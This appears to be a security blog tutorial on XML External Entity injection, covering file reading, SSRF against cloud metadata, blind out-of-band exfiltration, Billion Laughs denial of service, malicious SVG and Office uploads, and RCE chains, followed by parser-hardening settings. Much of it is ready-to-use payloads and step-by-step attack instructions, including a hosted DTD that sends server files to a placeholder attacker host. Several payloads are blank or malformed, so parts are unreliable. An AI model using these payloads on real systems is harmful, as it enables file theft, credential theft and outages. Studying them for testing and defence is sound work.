Listen to this Post

Introduction:
XML External Entity (XXE) injection is a critical web vulnerability that arises when poorly configured XML parsers process user-supplied input containing references to external entities. By exploiting this flaw, attackers can read arbitrary files on the server, perform Server-Side Request Forgery (SSRF) attacks, trigger denial-of-service (DoS), and, in some cases, achieve remote code execution (RCE) – all without leaving obvious traces in standard logs.
Learning Objectives:
- Understand how XML, DTD, and external entities interact to enable XXE attacks.
- Master practical exploitation techniques: file read, SSRF, blind XXE, and DoS.
- Learn to detect and mitigate XXE across different programming environments and cloud architectures.
You Should Know:
- Understanding XML External Entities – The Core Mechanism
XXE exploits the XML parser’s ability to fetch external resources defined in a Document Type Definition (DTD). The `SYSTEM` keyword forces the parser to retrieve content from a file or URL. A classic attack payload reads /etc/passwd:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <root>&xxe;</root>
Step‑by‑step guide – manual testing with cURL (Linux/macOS):
1. Save the above payload as `xxe_payload.xml`.
- Send it to a vulnerable endpoint expecting XML:
`curl -X POST -H “Content-Type: application/xml” -d @xxe_payload.xml http://target.com/api/xml` - Observe the server response – if the file content appears, XXE exists.
Windows alternative (PowerShell):
$body = Get-Content -Raw .\xxe_payload.xml Invoke-RestMethod -Uri "http://target.com/api/xml" -Method Post -ContentType "application/xml" -Body $body
Pro tip: Use `php://filter` on PHP‑based targets to read source code: file:///var/www/html/config.php, or wrap with base64 to avoid parsing errors.
- SSRF via XXE – Pivoting to Internal Networks
When external entities point to URLs instead of files, the XML parser becomes a proxy. Attackers can scan internal services, cloud metadata endpoints, or even trigger actions on internal APIs.
Payload for SSRF (AWS metadata):
<!ENTITY ssrf SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
Step‑by‑step – discovering internal hosts:
- Use Burp Suite or a simple Python HTTP server on your machine to catch callbacks.
- Inject a blind XXE payload pointing to your server:
` %oob;` - Monitor incoming requests – the target server will reveal its internal IP, hostname, and network routes.
4. For port scanning, iterate:
`` and measure response times.
Mitigation note: Cloud environments often expose metadata APIs at 169.254.169.254. Always restrict outbound HTTP/HTTPS from XML parsers and use network segmentation.
- Blind XXE Injection – Exfiltrating Data Without Direct Output
In blind XXE, the server does not reflect entity values in the response. Attackers use out‑of‑band (OOB) techniques via external DTDs. You host a malicious DTD file that forces the server to send file contents to your listener.
Malicious DTD (hosted as `oob.dtd`):
<!ENTITY % file SYSTEM "file:///etc/hostname"> <!ENTITY % eval "<!ENTITY &x25; exfil SYSTEM 'http://YOUR_IP:8080/?data=%file;'>"> %eval; %exfil;
Step‑by‑step – blind XXE with Burp Collaborator or netcat:
1. Start a listener: `nc -lvnp 8080` (Linux) or `nc -l -p 8080` (Windows with netcat).
2. Inject the following payload into the vulnerable XML request:
<?xml version="1.0"?> <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://YOUR_IP/oob.dtd"> %xxe;]> <root></root>
3. The server will fetch your DTD, evaluate it, and send `/etc/hostname` to your listener.
4. For Windows targets, use `file:///c:/windows/win.ini` or read registry hives.
Tooling: Use `xxeftp` or `Burp Collaborator` for automated blind XXE detection.
- Denial of Service – The Billion Laughs Attack
XXE can exhaust memory and CPU by recursively expanding entities. The “Billion Laughs” payload defines nested entities that explode into billions of characters.
Payload:
<?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> ... (repeat) <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <root>&lol9;</root>
Step‑by‑step – testing resilience:
- Upload this payload via any XML‑accepting endpoint (file upload, SOAP, REST XML).
- Monitor CPU and memory usage on the target (e.g., `top` or Windows Task Manager).
- A successful DoS will cause the application to become unresponsive or crash.
Mitigation: Limit entity expansion depth and size. Set parser limits like `XMLParser.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, “”)` in Java.
- XXE via File Upload – SVG and Office Documents
Modern applications often accept SVG images (which are XML) or Office Open XML documents (.docx, .xlsx). An attacker can embed XXE payloads inside these files.
Malicious SVG example:
<?xml version="1.0" encoding="UTF-8"?> <!ENTITY xxe SYSTEM "file:///etc/passwd"> <svg width="100" height="100"> <text x="10" y="20">&xxe;</text> </svg>
Step‑by‑step – exploiting SVG uploads:
- Create a file `evil.svg` with the above content.
- Upload it to a profile picture or image gallery endpoint.
- If the server renders the SVG server‑side (e.g., generating thumbnails), it will parse the entity and return the file content.
Windows / Linux commands to modify Office XML:
- Unzip a
.docx: `unzip document.docx -d docx_extracted` - Edit `word/document.xml` to include an external entity.
- Repack: `cd docx_extracted && zip -r ../poc.docx `
- Upload the modified docx – vulnerable document previewers will leak data.
- From XXE to Remote Code Execution – Advanced Scenarios
RCE via XXE is usually achieved through SSRF combined with other services:
– Expect header on PHP servers with `expect` module: ``
– Gopher/SSRF to internal Redis, Memcached, or FastCGI.
Example – exploiting exposed FastCGI (port 9000):
- Use SSRF to send a crafted FastCGI request that executes arbitrary PHP code.
2. Payload (simplified):
``
Step‑by‑step – safe lab practice:
- Set up a vulnerable Docker container (e.g.,
vulhub/xxe). - Use `burp` or `ffuf` to enumerate internal ports.
- For blind RCE, combine XXE with log poisoning (write to `access.log` then include via LFI).
Mitigation: Never enable `expect` in production. Disable all external entity resolution and restrict XML parser protocols to file, http, `https` where absolutely necessary – better yet, use JSON.
7. Detection and Mitigation – Hardening Your Defenses
Detection using Burp Collaborator / X5S:
- Send the following payload to every XML‑handling endpoint:
``
2. Look for DNS/HTTP interactions in Collaborator client.
Step‑by‑step – developer mitigation:
- Java (JAXP):
`factory.setFeature(“http://apache.org/xml/features/disallow-doctype-decl”, true);` - Python (lxml):
`parser = etree.XMLParser(resolve_entities=False, no_network=True)`
- PHP:
`libxml_disable_entity_loader(true);`
- .NET (C):
`XmlReaderSettings settings = new XmlReaderSettings { DtdProcessing = DtdProcessing.Prohibit, XmlResolver = null };`
Linux command to scan for dangerous XML configurations:
`grep -r “XMLParser\|SAXParser\|DocumentBuilder” /var/www/html/ –include=”.php”`
Windows PowerShell equivalent:
`Select-String -Path C:\inetpub\wwwroot\.config -Pattern “XmlReader|DtdProcessing”`
What Undercode Say:
- XXE is a forgotten giant – while SQL injection gets headlines, XXE remains widespread due to legacy XML parsers and default configurations.
- From file read to full compromise – a single XXE can lead to metadata token theft in cloud environments, turning a low‑severity bug into a critical breach.
- Detection is trivial with OOB techniques – modern tools like Burp Collaborator make blind XXE detection almost automatic; every penetration tester must master these methods.
XXE is not merely a “file read” issue – it’s a gateway to internal networks, server‑side exploits, and denial of service. Organizations often disable DTDs only after an incident. Proactive hardening, combined with shifting from XML to JSON where possible, remains the most effective defense.
Prediction:
As microservices and internal APIs continue to rely on backward‑compatible XML interfaces (SOAP, SAML, legacy ERP), XXE will resurface as a top‑10 vector in 2026–2027. AI‑powered fuzzing tools will automate blind XXE discovery, forcing vendors to finally remove DTD support by default. Meanwhile, cloud metadata service protections (IMDSv2) will render classic SSRF harder, but attackers will pivot to exploiting internal messaging brokers (RabbitMQ, ActiveMQ) via XXE‑driven SSRF. Expect a rise in combined XXE + Server‑Side Template Injection (SSTI) chains for RCE in enterprise Java applications.
▶️ Related Video (82% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Xxe Injection – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


